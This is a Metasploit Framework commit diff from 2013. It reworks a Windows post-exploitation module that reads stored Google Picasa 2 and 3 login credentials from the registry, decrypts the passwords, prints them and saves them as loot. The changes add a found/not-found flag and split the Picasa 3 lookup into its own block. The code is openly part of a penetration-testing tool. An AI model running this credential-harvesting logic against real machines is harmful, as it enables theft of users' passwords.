Merge branch 'picasa' of github.com:charles-n2netsec/metasploit-framework into charles-n2netsec-picasa

2013-01-22 22:54:45 -06:00 · 2013-01-22 22:54:45 -06:00 · dab2952d60
parent e376bb6fab 9671df4488
commit dab2952d60
1 changed files with 41 additions and 31 deletions
--- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
@ -70,7 +70,6 @@ class Metasploit3 < Msf::Post
 	end

 	def get_registry
-	psecrets = ""
 	
 		begin
 			print_status("Looking in registry for stored login passwords by Picasa ...")
@ -80,24 +79,6 @@ class Metasploit3 < Msf::Post
 			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
 			'GaiaPass')

-			if username != nil and password != nil
-				passbin = [password].pack("H*")
-				pass = decrypt_password(passbin)
-
-				if pass != nil
-					print_status("Username: #{username}")
-					print_status("Password: #{pass}")
-					secret = "#{username}:#{pass}"
-					psecrets << secret
-				end
-			end
-
-			#For early versions of Picasa3
-			username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
-			'GaiaEmail')
-			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
-			'GaiaPass')
-
 			credentials = Rex::Ui::Text::Table.new(
 					'Header'    => "Picasa Credentials",
 					'Indent'    => 1,
@ -107,15 +88,43 @@ class Metasploit3 < Msf::Post
 						"Password"
 					])
 			
+			
+			foundcreds = 0
 			if username != nil and password != nil				
 				passbin = [password].pack("H*")
 				pass = decrypt_password(passbin)

 				if pass != nil
-					print_status("Username: #{username}")
-					print_status("Password: #{pass}")
+					print_status("Found Picasa 2 credentials.")
+					print_good("Username: #{username}\t Password: #{pass}")				
 					
+					foundcreds = 1
 					credentials << [username,pass]
+
+				end
+			end
+
+			#For early versions of Picasa3
+			username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
+			'GaiaEmail')
+			password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
+			'GaiaPass')
+
+
+			if username != nil and password != nil
+				passbin = [password].pack("H*")
+				pass = decrypt_password(passbin)
+
+				if pass != nil
+					print_status("Found Picasa 3 credentials.")
+					print_good("Username: #{username}\t Password: #{pass}")					
+
+					foundcreds = 1
+					credentials << [username,pass]
+				end
+			end
+		
+		if foundcreds == 1
 			path = store_loot(
 			"picasa.creds",
 			"text/csv",
@ -125,7 +134,8 @@ class Metasploit3 < Msf::Post
 			"Decrypted Picasa Passwords")

 			print_status("Decrypted passwords saved in: #{path}")
-				end
+		else 
+			print_status("No Picasa credentials found.")
 		end

 		rescue ::Exception => e